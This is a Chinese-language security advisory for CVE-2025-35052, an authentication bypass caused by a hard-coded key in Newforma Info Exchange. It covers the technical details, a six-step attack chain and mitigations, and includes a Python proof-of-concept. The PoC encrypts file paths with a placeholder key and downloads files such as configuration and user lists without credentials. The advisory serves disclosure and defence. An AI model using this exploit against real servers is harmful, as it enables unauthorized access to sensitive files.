CVE-2025-35052：Newforma Info Exchange硬编码密钥导致认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-35052

漏洞类型

硬编码密钥/认证绕过/信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Newforma Info Exchange (NIX)

漏洞概述

CVE-2025-35052是Newforma Info Exchange（NIX）产品中的一个安全漏洞，该漏洞源于系统在加密某些查询参数时使用了硬编码密钥。由于该密钥在所有NIX安装实例中共享，攻击者可以获取该密钥后解密或伪造加密的查询参数值，从而绕过身份验证和授权机制。

具体而言，NIX的/DownloadWeb/download.aspx接口中使用了名为'qs'的加密查询参数，该参数可以指定文件下载的路径。由于加密密钥是硬编码且公开可知的，攻击者无需有效的凭据即可构造合法的加密参数，访问未经授权的文件资源。这导致未经认证的远程攻击者能够下载敏感文件，造成信息泄露。

该漏洞的CVSS 3.1评分为5.3，属于中等严重级别。其攻击向量为网络（AV:N），攻击复杂度低（AC:L），无需特权（PR:N），无需用户交互（UI:N），对机密性有低影响（C:L），对完整性和可用性无影响。虽然该漏洞不会直接导致系统被完全控制或数据被篡改，但敏感文件的未授权访问可能泄露商业机密、项目数据等重要信息，对企业造成重大损失。

受影响的版本包括NIX 2023.3和2024.1，厂商已在后续版本中限制硬编码密钥的使用。建议相关用户尽快升级到修复版本，并审查系统日志以检测潜在的未授权访问行为。

技术细节

该漏洞的核心技术问题在于Newforma Info Exchange（NIX）在处理文件下载请求时，使用了一个硬编码的对称加密密钥来加密查询参数。具体技术细节如下：

1. **硬编码密钥问题**：NIX在加密如'qs'等查询参数时使用了硬编码密钥，该密钥嵌入在应用程序代码或配置中，并且在所有NIX部署实例中保持一致。这意味着任何获取该密钥的人员都可以解密所有使用该密钥加密的参数。

2. **参数加密机制**：在/DownloadWeb/download.aspx接口中，'qs'参数被加密后传递，用于指定要下载的文件路径。正常情况下，服务器解密该参数后根据路径提供文件下载。

3. **绕过认证**：由于密钥是硬编码且可预测的，攻击者可以：
- 分析应用程序获取硬编码密钥
- 构造包含任意文件路径的明文参数
- 使用硬编码密钥加密该参数
- 将加密后的参数作为'qs'值发送到/DownloadWeb/download.aspx
- 服务器解密后认为请求合法，从而绕过认证和授权机制提供文件下载

4. **利用方式**：攻击者无需任何有效凭据即可远程利用此漏洞。只需构造一个包含目标文件路径的加密参数，即可通过HTTP GET请求访问敏感文件。

5. **影响范围**：该漏洞影响NIX 2023.3和2024.1版本，攻击者可访问未经授权的文件资源，导致敏感信息泄露。

攻击链分析

STEP 1

步骤1：获取硬编码密钥

攻击者通过逆向工程、代码审计或公开信息获取NIX应用程序中硬编码的加密密钥。由于该密钥在所有安装实例中共享，获取难度较低。

STEP 2

步骤2：识别目标接口

攻击者识别出/DownloadWeb/download.aspx接口使用加密的'qs'参数来指定文件下载路径。

STEP 3

步骤3：构造恶意参数

攻击者使用硬编码密钥加密包含目标文件路径的明文参数，构造合法的加密参数值。

STEP 4

步骤4：发送未授权请求

攻击者通过HTTP GET请求向/DownloadWeb/download.aspx发送包含加密参数的请求，无需任何认证凭据。

STEP 5

步骤5：绕过认证下载文件

服务器使用硬编码密钥解密参数，验证通过后提供文件下载，攻击者成功绕过认证和授权机制获取敏感文件。

STEP 6

步骤6：信息泄露

攻击者可重复上述过程下载多个敏感文件，导致机密信息泄露，可能包括商业数据、项目文件、用户信息等。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-35052 PoC - Newforma Info Exchange Hard-coded Key Authentication Bypass
# Exploit: Unauthorized file download via hard-coded encryption key in 'qs' parameter

import requests
from urllib.parse import quote

# Target NIX server
TARGET_URL = "https://target-nix-server/DownloadWeb/download.aspx"

# Hard-coded key extracted from NIX application (placeholder - actual key would be reverse-engineered)
HARDCODED_KEY = b'NIX_HARDCODED_KEY_HERE'

def encrypt_param(plaintext, key):
    """
    Encrypt the query parameter using the hard-coded key.
    The actual encryption algorithm (e.g., AES, DES, 3DES) and mode
    would need to be determined through reverse engineering.
    """
    # Example using AES-CBC (actual implementation may differ)
    from Crypto.Cipher import AES
    from Crypto.Util.Padding import pad
    import base64
    import os

    iv = b'\x00' * 16  # IV may be static or derived
    cipher = AES.new(key, AES.MODE_CBC, iv)
    padded = pad(plaintext.encode(), AES.block_size)
    encrypted = cipher.encrypt(padded)
    return base64.b64encode(encrypted).decode()

def exploit_file_download(target_file_path):
    """
    Exploit the hard-coded key vulnerability to download unauthorized files.
    """
    # Step 1: Construct the file path parameter
    qs_plaintext = target_file_path  # e.g., "\\\\\\\\files\\\\sensitive_document.pdf"

    # Step 2: Encrypt the parameter using the hard-coded key
    qs_encrypted = encrypt_param(qs_plaintext, HARDCODED_KEY)

    # Step 3: Send the request with the encrypted parameter
    params = {"qs": qs_encrypted}
    response = requests.get(TARGET_URL, params=params, verify=False)

    # Step 4: Check response
    if response.status_code == 200:
        print(f"[+] Successfully downloaded file: {target_file_path}")
        print(f"[+] Content-Length: {len(response.content)}")
        return response.content
    else:
        print(f"[-] Failed to download file. Status code: {response.status_code}")
        return None

# Example usage
if __name__ == "__main__":
    # Target sensitive file paths to download
    target_files = [
        "config/database.xml",
        "uploads/project_data.zip",
        "admin/users.xml"
    ]

    for file_path in target_files:
        print(f"\n[*] Attempting to download: {file_path}")
        content = exploit_file_download(file_path)
        if content:
            # Save the downloaded file
            filename = file_path.replace("/", "_").replace("\\\\", "_")
            with open(f"downloaded_{filename}", "wb") as f:
                f.write(content)
            print(f"[+] File saved as: downloaded_{filename}")

影响范围

Newforma Info Exchange (NIX) 2023.3

Newforma Info Exchange (NIX) 2024.1

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）在Web服务器或反向代理层面限制对/DownloadWeb/download.aspx接口的访问，仅允许授权用户访问；2）部署WAF规则检测异常的加密参数请求；3）监控服务器日志，及时发现未授权的文件下载行为；4）将敏感文件移至受保护的目录，限制通过Web接口直接访问；5）考虑实施IP白名单，限制只有内部网络可以访问下载接口。